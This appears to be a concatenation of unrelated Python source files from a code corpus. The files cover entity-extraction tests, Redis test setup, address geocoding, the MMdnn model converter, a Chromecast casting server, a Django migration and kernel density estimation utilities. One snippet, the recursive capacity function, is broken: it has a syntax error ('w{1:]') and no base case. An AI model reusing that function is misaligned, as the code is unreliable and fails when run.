        entities = [l for l, c, w in agg.entities]
        assert 'Foo Blubb' in entities, entities

    # def test_select_label(self):
    #     labels = ['Mr Blue', 'Mr BLUE', 'Mr Blu', 'Mr. Blue']
    #     assert select_label(labels) == 'Mr Blue'

    def test_phonenumber(self):
        # Phone numbers are extracted and imply a country entity ('in').
        agg = EntityAggregator()
        text = "Mr. <NAME> called the number tel:+919988111222 twice"
        agg.extract(text, ['en'])
        entities = [l for l, c, w in agg.entities]
        assert '+919988111222' in entities
        assert 'in' in entities

    def test_country(self):
        agg = EntityAggregator()
        text = """This is a document about the United States. But also about
        Syria and Germany.
        """
        agg.extract(text, ['en'])
        assert 'us' in agg.countries
        # fails
        assert 'de' in agg.countries
        assert 'sy' in agg.countries
| StarcoderdataPython |
3364856 | from __future__ import absolute_import
import os
import unittest
import redisext.backend.redis
REDIS_HOST = os.getenv('REDIS_HOST', 'localhost')
REDIS_PORT = os.getenv('REDIS_PORT', 6379)
REDIS_DB = os.getenv('REDIS_DB', 0)
class Connection(redisext.backend.redis.Connection):
    """Test Redis connection configured from environment variables."""
    # Master connection settings; defaults target a local test Redis.
    MASTER = {'host': REDIS_HOST, 'port': REDIS_PORT, 'db': REDIS_DB}
class TestCase(unittest.TestCase):
    """Base test case that wipes the test Redis database after each test."""
    def tearDown(self):
        Connection.connect_to_master().flushdb()
class KeyTestCase(TestCase):
    """Shared round-trip test for key/value storages.

    Subclasses set STORAGE to the storage class under test.
    """
    # Storage class under test; must be set by subclasses.
    STORAGE = None

    def test_keys(self):
        key, data = 'key', [{'key': 'value'}, 1, 'string', (1, 2, 3)]
        self.STORAGE(key).push(data)
        # Round-trip: what was pushed must come back unchanged.
        self.assertEqual(self.STORAGE(key).pop(), data)
| StarcoderdataPython |
1731253 | import pandas as pd
import results
from phrasegeo import Matcher, MatcherPipeline
from time import time
# load up the db
db_name = 'GNAF_VIC'
DB = f"postgresql:///{db_name}"
db = results.db(DB)

# set up the matchers
matcher1 = Matcher(db, how='standard')
matcher2 = Matcher(db, how='slow')
matcher3 = Matcher(db, how='trigram')

# pipeline setup
pipeline = MatcherPipeline([matcher1, matcher2, matcher3])

# load up the test addresses
df = pd.read_csv('phrasegeo/datasets/addresses1.csv')
addresslist = list(df['ADDRESS'].values)

# another set of test addresses
# NOTE(review): this overwrites the address list loaded above; comment one
# of the two loads out depending on which data set should be used.
df = pd.read_csv('phrasegeo/datasets/nab_atm_vic.csv')
addresslist = list(df['address'].values)

# set up the geocoder if this hasn't already been done
# i.e., create the phrase and inverted index tables
# will throw an error if this has already been setup
# or if the GNAF has not been setup correctly
# BUG FIX: the original called `matcher.setup()`, but no `matcher` name is
# defined above (only matcher1/2/3), which raised a NameError.
matcher1.setup()

# do the matching for a single matcher
t1 = time()
matches = matcher1.match(addresslist)
t2 = time()
print(f'Matched {len(matches)} addresses in {round(t2-t1, 2)} sec.')

# do the matching through a pipeline
t1 = time()
matches = pipeline.match(addresslist)
t2 = time()
print(f'Matched {len(matches)} addresses in {round(t2-t1, 2)} sec.')

# convert to a pandas dataframe
df_matches = pd.DataFrame(matches)
# NOTE(review): hard-coded absolute user path; parameterise before sharing.
df_matches.to_csv('/Users/vic2e3a/Desktop/Data/GNAF/outputs_2021/nab_atm_geocoded.csv', index=False)
3280550 | <reponame>ankitshah009/MMdnn<gh_stars>1000+
import sys as _sys
import google.protobuf.text_format as text_format
from six import text_type as _text_type
def _convert(args):
    """Dispatch model conversion to the parser for ``args.srcFramework``.

    Builds an intermediate-representation (IR) file set at ``args.dstPath``.

    :param args: parsed argparse namespace (see ``_get_parser``).
    :return: 0 on success.
    :raises ValueError: for an unknown source framework, or missing
        TensorFlow node/shape information.
    :raises NotImplementedError: for the unsupported caffe2 framework.
    """
    # Parse the optional --inputShape values ("a,b,c" strings) into lists of
    # ints; a single-element [None] means "no shape given".
    if args.inputShape != None:
        inputshape = []
        for x in args.inputShape:
            shape = x.split(',')
            inputshape.append([int(x) for x in shape])
    else:
        inputshape = [None]
    if args.srcFramework == 'caffe':
        # Caffe writes the IR files itself and returns early.
        from mmdnn.conversion.caffe.transformer import CaffeTransformer
        transformer = CaffeTransformer(args.network, args.weights, "tensorflow", inputshape[0], phase = args.caffePhase)
        graph = transformer.transform_graph()
        data = transformer.transform_data()

        from mmdnn.conversion.caffe.writer import JsonFormatter, ModelSaver, PyWriter
        JsonFormatter(graph).dump(args.dstPath + ".json")
        print ("IR network structure is saved as [{}.json].".format(args.dstPath))

        prototxt = graph.as_graph_def().SerializeToString()
        with open(args.dstPath + ".pb", 'wb') as of:
            of.write(prototxt)
        print ("IR network structure is saved as [{}.pb].".format(args.dstPath))

        import numpy as np
        with open(args.dstPath + ".npy", 'wb') as of:
            np.save(of, data)
        print ("IR weights are saved as [{}.npy].".format(args.dstPath))

        return 0
    elif args.srcFramework == 'caffe2':
        raise NotImplementedError("Caffe2 is not supported yet.")
    elif args.srcFramework == 'keras':
        if args.network != None:
            model = (args.network, args.weights)
        else:
            model = args.weights

        from mmdnn.conversion.keras.keras2_parser import Keras2Parser
        parser = Keras2Parser(model)
    elif args.srcFramework == 'tensorflow' or args.srcFramework == 'tf':
        assert args.network or args.weights
        if not args.network:
            # Frozen graph: input/output node names and shapes are mandatory.
            if args.dstNodeName is None:
                raise ValueError("Need to provide the output node of Tensorflow model.")
            if args.inNodeName is None:
                raise ValueError("Need to provide the input node of Tensorflow model.")
            if inputshape is None:
                raise ValueError("Need to provide the input node shape of Tensorflow model.")
            assert len(args.inNodeName) == len(inputshape)
            from mmdnn.conversion.tensorflow.tensorflow_frozenparser import TensorflowParser2
            parser = TensorflowParser2(args.weights, inputshape, args.inNodeName, args.dstNodeName)

        else:
            from mmdnn.conversion.tensorflow.tensorflow_parser import TensorflowParser
            if args.inNodeName and inputshape[0]:
                parser = TensorflowParser(args.network, args.weights, args.dstNodeName, inputshape[0], args.inNodeName)
            else:
                parser = TensorflowParser(args.network, args.weights, args.dstNodeName)
    elif args.srcFramework == 'mxnet':
        assert inputshape != None
        if args.weights == None:
            model = (args.network, inputshape[0])
        else:
            # BUG FIX: the original used re.search('.', args.weights), which
            # matches any non-empty string.  The intent is to strip a
            # '.params' suffix (7 characters) from e.g. 'model-0000.params'
            # before splitting into checkpoint prefix and epoch.
            if args.weights.endswith('.params'):
                args.weights = args.weights[:-7]
            prefix, epoch = args.weights.rsplit('-', 1)
            model = (args.network, prefix, epoch, inputshape[0])

        from mmdnn.conversion.mxnet.mxnet_parser import MXNetParser
        parser = MXNetParser(model)
    elif args.srcFramework == 'cntk':
        from mmdnn.conversion.cntk.cntk_parser import CntkParser
        model = args.network or args.weights
        parser = CntkParser(model)
    elif args.srcFramework == 'pytorch':
        assert inputshape != None
        from mmdnn.conversion.pytorch.pytorch_parser import PytorchParser040
        from mmdnn.conversion.pytorch.pytorch_parser import PytorchParser151
        import torch
        model = args.network or args.weights
        assert model != None
        # Models serialised with torch 0.4.0 need the legacy parser.
        if torch.__version__ == "0.4.0":
            parser = PytorchParser040(model, inputshape[0])
        else:
            parser = PytorchParser151(model, inputshape[0])
    elif args.srcFramework == 'torch' or args.srcFramework == 'torch7':
        from mmdnn.conversion.torch.torch_parser import TorchParser
        model = args.network or args.weights
        assert model != None
        parser = TorchParser(model, inputshape[0])
    elif args.srcFramework == 'onnx':
        from mmdnn.conversion.onnx.onnx_parser import ONNXParser
        parser = ONNXParser(args.network)
    elif args.srcFramework == 'darknet':
        from mmdnn.conversion.darknet.darknet_parser import DarknetParser
        parser = DarknetParser(args.network, args.weights, args.darknetStart)
    elif args.srcFramework == 'coreml':
        from mmdnn.conversion.coreml.coreml_parser import CoremlParser
        parser = CoremlParser(args.network)
    else:
        raise ValueError("Unknown framework [{}].".format(args.srcFramework))

    parser.run(args.dstPath)
    return 0
def _get_parser():
    """Build the argparse parser for the model-to-IR conversion CLI.

    :return: configured ``argparse.ArgumentParser`` instance.
    """
    import argparse

    parser = argparse.ArgumentParser(description = 'Convert other model file formats to IR format.')

    parser.add_argument(
        '--srcFramework', '-f',
        type=_text_type,
        choices=["caffe", "caffe2", "cntk", "mxnet", "keras", "tensorflow", 'tf', 'torch', 'torch7', 'onnx', 'darknet', 'coreml', 'pytorch'],
        help="Source toolkit name of the model to be converted.")

    parser.add_argument(
        '--weights', '-w', '-iw',
        type=_text_type,
        default=None,
        help='Path to the model weights file of the external tool (e.g caffe weights proto binary, keras h5 binary')

    parser.add_argument(
        '--network', '-n', '-in',
        type=_text_type,
        default=None,
        help='Path to the model network file of the external tool (e.g caffe prototxt, keras json')

    parser.add_argument(
        '--dstPath', '-d', '-o',
        type=_text_type,
        required=True,
        help='Path to save the IR model.')

    parser.add_argument(
        '--inNodeName', '-inode',
        nargs='+',
        type=_text_type,
        default=None,
        help="[Tensorflow] Input nodes' name of the graph.")

    parser.add_argument(
        '--dstNodeName', '-node',
        nargs='+',
        type=_text_type,
        default=None,
        help="[Tensorflow] Output nodes' name of the graph.")

    parser.add_argument(
        '--inputShape',
        nargs='+',
        type=_text_type,
        default=None,
        help='[Tensorflow/MXNet/Caffe2/Torch7] Input shape of model (channel, height, width)')

    # Caffe
    parser.add_argument(
        '--caffePhase',
        type=_text_type,
        default='TRAIN',
        help='[Caffe] Convert the specific phase of caffe model.')

    # Darknet
    parser.add_argument(
        '--darknetStart',
        type=_text_type,
        choices=["0", "1"],
        help='[Darknet] Parse the darknet model weight file from the start.')

    return parser
def _main():
    """Command-line entry point: parse arguments, convert, exit with status."""
    args = _get_parser().parse_args()
    ret = _convert(args)
    # cast to int or else the exit code is always 1
    _sys.exit(int(ret))
if __name__ == '__main__':
_main()
| StarcoderdataPython |
3278103 | <gh_stars>0
import datetime
import http.server
import logging
import socket
import socketserver
import time
from multiprocessing import Process
from pathlib import Path
from caster import Caster
from speech_synthesizer import SpeechSynthesizer
from yahoo_train_info_scraper import YahooTrainInfoScraper
logger = logging.getLogger(__name__)
def serve(port):
    """Serve the current working directory over HTTP on *port* (blocking).

    Intended to run in a child process so the main process can continue.
    """
    logger.info(f"serving at port {port}")
    Handler = http.server.SimpleHTTPRequestHandler
    with socketserver.TCPServer(("", port), Handler) as httpd:
        httpd.serve_forever()
class Server:
    """Hosts a local audio file over HTTP and casts it to a Chromecast."""

    def __init__(self):
        pass

    @classmethod
    def ip_addr(cls) -> str:
        """Return the local IP address used for outbound traffic."""
        # Open a UDP "connection" to a public address purely to discover
        # which local interface/IP would be used; no packets are sent.
        s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
        s.connect(("8.8.8.8", 80))
        ip = s.getsockname()[0]
        s.close()
        return ip

    def start(self, friendly_name: str, file_path: Path):
        """Serve *file_path* and tell the named Chromecast to play it.

        :param friendly_name: Chromecast device name.
        :param file_path: path to the audio file, relative to the working
            directory the HTTP server process serves from.
        """
        port = 8000
        p = Process(target=serve, args=(port,), daemon=True)
        p.start()
        # send to chromecast (as a promise, audio file is hosted by another http.server process)
        caster = Caster(friendly_name)
        server_host = Server.ip_addr()
        logger.info(f"serve at {server_host}:{port}")
        caster.cast(f"http://{server_host}:{port}/{file_path}")
        # Keep the daemon server process alive long enough for playback to
        # start; it dies with this process afterwards.
        time.sleep(20)
| StarcoderdataPython |
def capacity(K, w):
    """Return a list of weights from *w* that sums exactly to *K*, or None.

    Weights are tried largest-first.  Unlike the original, the caller's
    list is left unmodified (the original sorted it in place).
    """
    return _capacity(K, sorted(w, reverse=True))
def _capacity(K, w):
cut = 0
while w[cut] > K:
cut += 1
w = w[cut:]
sub = _capacity(K-w[0], w[1:])
if sub is None:
sub = _capacity(K, w{1:])
if sub is None:
return None
else:
return sub
else:
sub.append(w[0])
return sub
| StarcoderdataPython |
3225222 | # Generated by Django 2.0.5 on 2018-05-24 08:27
from django.db import migrations
class Migration(migrations.Migration):
    """Drop the unused ``description`` field from the ``document`` model."""

    dependencies = [
        ('sim_v1', '0001_initial'),
    ]

    operations = [
        migrations.RemoveField(
            model_name='document',
            name='description',
        ),
    ]
| StarcoderdataPython |
1728224 | <gh_stars>1-10
# Copyright (c) 2021. <NAME>, Ghent University
import math
import warnings
import numpy as np
import pandas as pd
from numpy.random import uniform
from scipy import ndimage, integrate
from sklearn.model_selection import GridSearchCV
from sklearn.neighbors import KernelDensity
from sklearn.utils import check_array
from skbel.algorithms.extmath import get_block
__all__ = [
"KDE",
"kde_params",
"posterior_conditional",
"mvn_inference",
"it_sampling",
"normalize",
]
def tupleset(t, i, value):
    """Return a copy of tuple *t* with element *i* replaced by *value*.

    :param t: tuple
    :param i: index (negative indices supported)
    :param value: value
    :return: new tuple
    """
    items = list(t)
    items[i] = value
    return tuple(items)
def romb(y: np.array, dx: float = 1.0) -> np.array:
    """Romberg integration using samples of a function.

    :param y: A vector of ``2**k + 1`` equally-spaced samples of a function.
    :param dx: The sample spacing. Default is 1.
    :return: The integral of the function.
    """
    y = np.asarray(y)
    nd = len(y.shape)
    axis = -1
    Nsamps = y.shape[axis]
    Ninterv = Nsamps - 1
    # Verify Ninterv is a power of two (required by the interval-halving
    # scheme below); k ends up as log2(Ninterv).
    n = 1
    k = 0
    while n < Ninterv:
        n <<= 1
        k += 1
    if n != Ninterv:
        raise ValueError(
            "Number of samples must be one plus a " "non-negative power of 2."
        )
    # R[(i, j)] is the Romberg table: row i = trapezoid estimate with 2**i
    # intervals, column j = j-th Richardson extrapolation of that row.
    R = {}
    slice_all = (slice(None),) * nd
    slice0 = tupleset(slice_all, axis, 0)
    slicem1 = tupleset(slice_all, axis, -1)
    h = Ninterv * np.asarray(dx, dtype=float)
    R[(0, 0)] = (y[slice0] + y[slicem1]) / 2.0 * h
    slice_R = slice_all
    start = stop = step = Ninterv
    for i in range(1, k + 1):
        start >>= 1
        # Select only the newly-added midpoints for this refinement level.
        slice_R = tupleset(slice_R, axis, slice(start, stop, step))
        step >>= 1
        R[(i, 0)] = 0.5 * (R[(i - 1, 0)] + h * y[slice_R].sum(axis=axis))
        for j in range(1, i + 1):
            prev = R[(i, j - 1)]
            # Richardson extrapolation cancels the O(h**(2j)) error term.
            R[(i, j)] = prev + (prev - R[(i - 1, j - 1)]) / ((1 << (2 * j)) - 1)
        h /= 2.0
    return R[(k, k)]
class KDE:
"""Bivariate kernel density estimator.
This class is adapted from the class of the same name in the package Seaborn 0.11.1
https://seaborn.pydata.org/generated/seaborn.kdeplot.html
"""
    def __init__(
        self,
        *,
        kernel_type: str = None,
        bandwidth: float = None,
        grid_search: bool = True,
        bandwidth_space: np.array = None,
        gridsize: int = 200,
        cut: float = 1,
        clip: list = None,
    ):
        """Initialize the estimator with its parameters.

        :param kernel_type: kernel type, one of 'gaussian', 'tophat', 'epanechnikov',
         'exponential', 'linear', 'cosine'
        :param bandwidth: bandwidth
        :param grid_search: perform a grid search for the bandwidth
        :param bandwidth_space: array of bandwidths to try
        :param gridsize: number of points on each dimension of the evaluation grid.
        :param cut: Factor, multiplied by the smoothing bandwidth, that determines how
         far the evaluation grid extends past the extreme datapoints. When
         set to 0, truncate the curve at the data limits.
        :param clip: A list of two elements, the lower and upper bounds for the
         support of the density. If None, the support is the range of the data.
        """
        if clip is None:
            # (None, None) means unbounded on both sides.
            clip = None, None

        self.kernel_type = kernel_type
        if kernel_type is None:
            self.kernel_type = "gaussian"  # default
        self.bw = bandwidth
        self.grid_search = grid_search
        if bandwidth_space is None:
            # Default grid-search space: 50 log-spaced bandwidths in [0.01, 10].
            self.bandwidth_space = np.logspace(-2, 1, 50)  # default bandwidths
        else:
            self.bandwidth_space = bandwidth_space
        self.gridsize = gridsize
        self.cut = cut
        self.clip = clip
        # Evaluation grid; populated lazily by define_support().
        self.support = None
    @staticmethod
    def _define_support_grid(
        x: np.array, bandwidth: float, cut: float, clip: list, gridsize: int
    ):
        """Create the grid of evaluation points depending for vector x.

        :param x: vector of values
        :param bandwidth: bandwidth
        :param cut: factor, multiplied by the smoothing bandwidth, that determines how
         far the evaluation grid extends past the extreme datapoints. When
         set to 0, truncate the curve at the data limits.
        :param clip: pair of numbers None, or a pair of such pairs
         Do not evaluate the density outside of these limits.
        :param gridsize: number of points on each dimension of the evaluation grid.
        :return: evaluation grid
        """
        # None clip bounds mean unbounded on that side.
        clip_lo = -np.inf if clip[0] is None else clip[0]
        clip_hi = +np.inf if clip[1] is None else clip[1]
        # Fall back to a unit bandwidth when none was supplied, so the grid
        # still extends `cut` units beyond the data.
        bw = 1 if bandwidth is None else bandwidth
        gridmin = max(x.min() - bw * cut, clip_lo)
        gridmax = min(x.max() + bw * cut, clip_hi)
        return np.linspace(gridmin, gridmax, gridsize)
    def _define_support_univariate(self, x: np.array):
        """Create a 1D grid of evaluation points.

        :param x: 1D array of data
        :return: 1D array of evaluation points
        """
        grid = self._define_support_grid(
            x, self.bw, self.cut, self.clip, self.gridsize
        )  # define grid
        return grid
def _define_support_bivariate(self, x1: np.array, x2: np.array):
"""Create a 2D grid of evaluation points.
:param x1: 1st dimension of the evaluation grid
:param x2: 2nd dimension of the evaluation grid
:return: 2D grid of evaluation points
"""
clip = self.clip
if clip[0] is None or np.isscalar(clip[0]): # if clip is a single number
clip = (clip, clip)
grid1 = self._define_support_grid(
x1, self.bw, self.cut, clip[0], self.gridsize
) # define grid for x1
grid2 = self._define_support_grid(
x2, self.bw, self.cut, clip[1], self.gridsize
) # define grid for x2
return grid1, grid2
def define_support(
self,
x1: np.array,
x2: np.array = None,
cache: bool = True,
):
"""Create the evaluation grid for a given data set.
:param x1: 1D array of data
:param x2: 2D array of data
:param cache: if True, cache the support grid
:return: grid of evaluation points
"""
if x2 is None:
support = self._define_support_univariate(x1) # 1D
else:
support = self._define_support_bivariate(x1, x2) # 2D
if cache:
self.support = support # cache the support grid
return support
def _fit(self, fit_data: np.array):
"""Fit the scikit-learn KDE.
:param fit_data: Data to fit the KDE to
:return: fitted KDE object
"""
bw = 1 if self.bw is None else self.bw # bandwidth
fit_kws = {
"bandwidth": bw,
"algorithm": "auto", # kdtree or ball_tree
"kernel": self.kernel_type,
"metric": "euclidean", # default
"atol": 1e-4, # tolerance for convergence
"rtol": 0, #
"breadth_first": True, #
"leaf_size": 40,
"metric_params": None,
} # define the kernel density estimator parameters
kde = KernelDensity(**fit_kws) # initiate the estimator
if self.grid_search and not self.bw:
# GridSearchCV maximizes the total log probability density under the model.
# The data X will be be divided into train-test splits based on folds defined in cv param
# For each combination of parameters that you specified in param_grid, the model
# will be trained on the train part from the step above and then scoring will be used on test part.
# The scores for each parameter combination will be combined for all the folds and averaged.
# Highest performing parameter will be selected.
grid = GridSearchCV(
kde, {"bandwidth": self.bandwidth_space}
) # Grid search on bandwidth
grid.fit(fit_data) # Fit the grid search
self.bw = grid.best_params_[
"bandwidth"
] # Set the bandwidth to the best bandwidth
fit_kws["bandwidth"] = self.bw # Update the bandwidth in the fit_kws
kde.set_params(
**{"bandwidth": self.bw}
) # Update the bandwidth in the scikit-learn model
kde.fit(fit_data) # Fit the KDE
return kde
def _eval_univariate(self, x: np.array):
"""Fit and evaluate on univariate data.
:param x: Data to evaluate.
:return: (density, support)
"""
support = self.support
if support is None:
support = self.define_support(x, cache=True)
kde = self._fit(x.reshape(-1, 1))
density = np.exp(kde.score_samples(support.reshape(-1, 1))) # evaluate the KDE
return density, support
def _eval_bivariate(self, x1: np.array, x2: np.array):
"""Fit and evaluate on bivariate data.
:param x1: First data set.
:param x2: Second data set.
:return: (density, support)
"""
support = self.support
if support is None:
support = self.define_support(x1, x2, cache=False)
X_train = np.vstack([x1, x2]).T
kde = self._fit(X_train)
X, Y = np.meshgrid(*support)
grid = np.vstack([X.ravel(), Y.ravel()]).T
density = np.exp(kde.score_samples(grid)) # evaluate the KDE
density = density.reshape(X.shape)
return density, support
def __call__(self, x1, x2=None):
"""Fit and evaluate on univariate or bivariate data."""
if x2 is None:
return self._eval_univariate(x1)
else:
return self._eval_bivariate(x1, x2)
def _univariate_density(
    data_variable: pd.DataFrame,
    estimate_kws: dict,
):
    """Estimate the density of a single variable.

    :param data_variable: DataFrame holding the variable in column "x".
    :param estimate_kws: keyword arguments forwarded to the KDE estimator.
    :return: tuple (density, support, bandwidth)
    """
    estimator = KDE(**estimate_kws)
    # Drop nulls, then pull the raw observations out of the frame.
    observations = data_variable.dropna()["x"].to_numpy()
    # A zero-variance (or empty) sample cannot yield a meaningful KDE; warn
    # but still proceed, preserving the best-effort behaviour.
    variance = observations.var()
    if math.isclose(variance, 0) or np.isnan(variance):
        warnings.warn("Dataset has 0 variance; skipping density estimate.", UserWarning)
    density, support = estimator(observations)
    return density, support, estimator.bw
def _bivariate_density(
    data: pd.DataFrame,
    estimate_kws: dict,
):
    """Estimate a bivariate KDE.

    :param data: DataFrame holding the observations in columns "x" and "y".
    :param estimate_kws: keyword arguments forwarded to the KDE estimator.
    :return: tuple (density, support, bandwidth)
    """
    estimator = KDE(**estimate_kws)
    # Drop rows with nulls before extracting the (x, y) observations.
    observations = data.dropna()[["x", "y"]]
    # Warn (but still proceed) when either coordinate is degenerate.
    variance = observations[["x", "y"]].var()
    if any(math.isclose(v, 0) for v in variance) or variance.isna().any():
        warnings.warn("Dataset has 0 variance; skipping density estimate.", UserWarning)
    density, support = estimator(observations["x"], observations["y"])
    return density, support, estimator.bw
def kde_params(
    x: np.array = None,
    y: np.array = None,
    bw: float = None,
    gridsize: int = 200,
    cut: float = 1,
    clip=None,
):
    """Computes the kernel density estimate (KDE) of one or two data sets.

    :param x: x-coordinates of the input data.
    :param y: y-coordinates of the input data (optional; triggers a 2D KDE).
    :param bw: bandwidth of the kernel.
    :param gridsize: number of discrete points in the evaluation grid.
    :param cut: draw the estimate to cut * bw from the extreme data points.
    :param clip: lower/upper bounds for datapoints used to fit the KDE; a
        pair of (low, high) bounds can be provided for bivariate plots.
    :return: (density, support, bw): the estimated probability density, the
        grid it was evaluated on, and the bandwidth actually used.
    """
    # Pack the estimator settings once; both branches share them.
    estimate_kws = {
        "bandwidth": bw,
        "gridsize": gridsize,
        "cut": cut,
        "clip": clip,
    }
    if y is None:
        frame = pd.DataFrame(data={"x": x})
        return _univariate_density(data_variable=frame, estimate_kws=estimate_kws)
    frame = pd.DataFrame(data={"x": x, "y": y})
    return _bivariate_density(data=frame, estimate_kws=estimate_kws)
def _pixel_coordinate(line: list, x_1d: np.array, y_1d: np.array, k: int = None):
"""Gets the pixel coordinate of the value x or y, in order to get posterior
conditional probability given a KDE.
:param line: Coordinates of the line we'd like to sample along [(x1, y1), (x2, y2)]
:param x_1d: List of x coordinates along the axis
:param y_1d: List of y coordinates along the axis
:param k: Used to set number of rows/columns
:return: (rows, columns)
"""
if k is None:
num = 200
else:
num = k
# https://stackoverflow.com/questions/18920614/plot-cross-section-through-heat-map
# Convert the line to pixel/index coordinates
x_world, y_world = np.array(list(zip(*line)))
col = y_1d.shape * (x_world - min(x_1d)) / x_1d.ptp()
row = x_1d.shape * (y_world - min(y_1d)) / y_1d.ptp()
# Interpolate the line at "num" points...
row, col = [np.linspace(item[0], item[1], num) for item in [row, col]]
return row, col
def _conditional_distribution(
    kde_array: np.array,
    x_array: np.array,
    y_array: np.array,
    x: float = None,
    y: float = None,
    k: int = None,
):
    """Compute the conditional posterior distribution p(x_array|y_array) given
    x or y.  Provide only one observation — either x or y.  Performs a
    cross-section through the KDE along the corresponding axis.

    :param kde_array: KDE of the prediction (2D array)
    :param x_array: X grid (1D)
    :param y_array: Y grid (1D)
    :param x: Observed data (horizontal axis)
    :param y: Observed data (vertical axis)
    :param k: Number of sample points along the cross-section (default 200)
    :return: (cross_section, line): KDE values along the cut and its support
    """
    # Normalize k ONCE up front: the previous code forwarded a possibly-None
    # k to np.linspace below, which raised a TypeError whenever the caller
    # relied on the default.
    num = 200 if k is None else k
    # Coordinates of the line we'd like to sample along
    if x is not None:
        line = [(x, min(y_array)), (x, max(y_array))]
    elif y is not None:
        line = [(min(x_array), y), (max(x_array), y)]
    else:
        msg = "No observation point included."
        warnings.warn(msg, UserWarning)
        return 0
    # Convert line to row/column pixel coordinates.
    row, col = _pixel_coordinate(line=line, x_1d=x_array, y_1d=y_array, k=num)
    # Extract the KDE values along the line, using spline interpolation.
    zi = ndimage.map_coordinates(kde_array, np.vstack((row, col)))
    # Support of the cross-section: the axis we cut ALONG.
    if x is not None:
        line = np.linspace(min(y_array), max(y_array), num)
    else:
        line = np.linspace(min(x_array), max(x_array), num)
    return zi, line
def _scale_distribution(post: np.array, support: np.array) -> np.array:
"""Scale the distribution to have a maximum of 1, and a minimum of 0.
:param post: Values of the KDE cross-section
:param support: Support of the KDE cross-section
:return: The scaled distribution
"""
post[np.abs(post) < 1e-8] = 0 # Rule of thumb
if post.any(): # If there is any value
a = integrate.simps(y=np.abs(post), x=support) # Integrate the absolute values
post *= 1 / a # Scale the distribution
return post
def posterior_conditional(
    X_obs: float = None,
    Y_obs: float = None,
    dens: np.array = None,
    support: np.array = None,
    k: int = None,
) -> (np.array, np.array):
    """Computes the posterior distribution p(y|x_obs) or p(x|y_obs) by doing a
    cross section of the KDE of (d, h).

    :param X_obs: Observation on the predictor (x) axis
    :param Y_obs: Observation on the target (y) axis
    :param dens: Density values of the KDE of (X, Y)
    :param support: Support grid (xg, yg) of the KDE of (X, Y)
    :param k: Number of sample points along the cross-section
    :return: (posterior distribution, support of the cross-section)
    """
    xg, yg = support  # unpack the two grid axes
    if X_obs is None and Y_obs is None:
        warnings.warn("No observation point included.", UserWarning)
        return 0
    if X_obs is not None:
        # Scalars only: keep the first element of list/array observations.
        if isinstance(X_obs, (list, np.ndarray)):
            X_obs = X_obs[0]
        post, line = _conditional_distribution(
            x=X_obs, x_array=xg, y_array=yg, kde_array=dens, k=k
        )
    else:
        if isinstance(Y_obs, (list, np.ndarray)):
            Y_obs = Y_obs[0]
        post, line = _conditional_distribution(
            y=Y_obs, x_array=xg, y_array=yg, kde_array=dens, k=k
        )
    # Normalize the cut so it integrates to 1 over its support.
    post = _scale_distribution(post, line)
    return post, line
def mvn_inference(
    X: np.array, Y: np.array, X_obs: np.array, **kwargs
) -> (np.array, np.array):
    """Estimates the posterior mean and covariance of the target.

    Linear-Gaussian inference in canonical space: a least-squares linear map
    from Y to X is fitted, a joint covariance block matrix is assembled, and
    the Gaussian conditioning formulas give the posterior of Y given X_obs.
    Note that in this implementation, n_samples must be = 1.

    .. [1] <NAME>. Inverse Problem Theory and Methods for Model Parameter Estimation.
    SIAM, 2005. Pages: 70-71

    :param X: Canonical Variate of the training data
    :param Y: Canonical Variate of the training target, gaussian-distributed
    :param X_obs: Canonical Variate of the observation (n_samples, n_features).
    :param kwargs: optional; "x_cov" supplies an extra covariance term added
        to the modeling-error covariance in the s22 block.
    :return: y_posterior_mean, y_posterior_covariance
    """
    # Defensive copies; ensure_2d=False allows 1D canonical variates.
    Y = check_array(Y, copy=True, ensure_2d=False)
    X = check_array(X, copy=True, ensure_2d=False)
    X_obs = check_array(X_obs, copy=True, ensure_2d=False)
    # Size of the set
    n_training = X.shape[0]
    # Computation of the posterior mean in Canonical space
    y_mean = np.mean(Y, axis=0)  # (n_comp_CCA, 1) # noqa
    # Mean is 0, as expected.
    y_mean = np.where(np.abs(y_mean) < 1e-8, 0, y_mean)
    # Evaluate the covariance in h (in Canonical space)
    # Very close to the Identity matrix
    # (n_comp_CCA, n_comp_CCA)
    y_cov = np.cov(Y.T) # noqa
    # Optional extra observational covariance; defaults to zero.
    if "x_cov" in kwargs.keys():
        x_cov = kwargs["x_cov"]
    else:
        x_cov = np.zeros(shape=y_cov.shape)
    # Linear modeling h to d (in canonical space) with least-square criterion.
    # Pay attention to the transpose operator.
    # Computes the vector g that approximately solves the equation y @ g = x.
    g = np.linalg.lstsq(Y, X, rcond=None)[0].T
    # Replace values below threshold by 0.
    g = np.where(np.abs(g) < 1e-8, 0, g) # (n_comp_CCA, n_comp_CCA)
    # Modeling error due to deviations from theory
    # (n_components_CCA, n_training)
    x_ls_predicted = np.matmul(Y, g.T) # noqa
    x_modeling_mean_error = np.mean(X - x_ls_predicted, axis=0) # (n_comp_CCA, 1)
    # Center the residuals by tiling the mean error over all training rows.
    x_modeling_error = (
        X - x_ls_predicted - np.tile(x_modeling_mean_error, (n_training, 1))
    )
    # (n_comp_CCA, n_training)
    # Information about the covariance of the posterior distribution in Canonical space.
    x_modeling_covariance = np.cov(x_modeling_error.T) # (n_comp_CCA, n_comp_CCA)
    # Build block matrix
    # NOTE(review): s11 is bound BEFORE the 0-d fallback below wraps y_cov in
    # a list — verify the single-component (scalar covariance) path behaves
    # as intended.
    s11 = y_cov
    if y_cov.ndim == 0:
        y_cov = [y_cov]
    s12 = y_cov @ g.T
    s21 = g @ y_cov
    s22 = g @ y_cov @ g.T + x_cov + x_modeling_covariance
    block = np.block([[s11, s12], [s21, s22]])
    # Inverse
    # pinv tolerates a singular block matrix (pseudo-inverse).
    delta = np.linalg.pinv(block)
    # Partition block
    # get_block is defined elsewhere in this file; presumably it extracts the
    # (1,1) and (1,2) sub-blocks of the partitioned inverse — TODO confirm
    # its indexing convention.
    d11 = get_block(delta, 1)
    d12 = get_block(delta, 2)
    # Observe that posterior covariance does not depend on observed x.
    y_posterior_covariance = np.linalg.pinv(d11) # (n_comp_CCA, n_comp_CCA)
    # Computing the posterior mean is simply a linear operation, given precomputed posterior covariance.
    y_posterior_mean = y_posterior_covariance @ (
        d11 @ y_mean - d12 @ (X_obs[0] - x_modeling_mean_error - y_mean @ g.T) # noqa
    ) # (n_comp_CCA,)
    return y_posterior_mean, y_posterior_covariance
def normalize(pdf):
    """Return a normalized wrapper around a sampled PDF.

    :param pdf: object with ``x`` (uniformly spaced support) and ``y``
        (density values) attributes; the density need not be normalized.
    :return: pdf_norm: function mapping x -> pdf(x) / A, where A is the
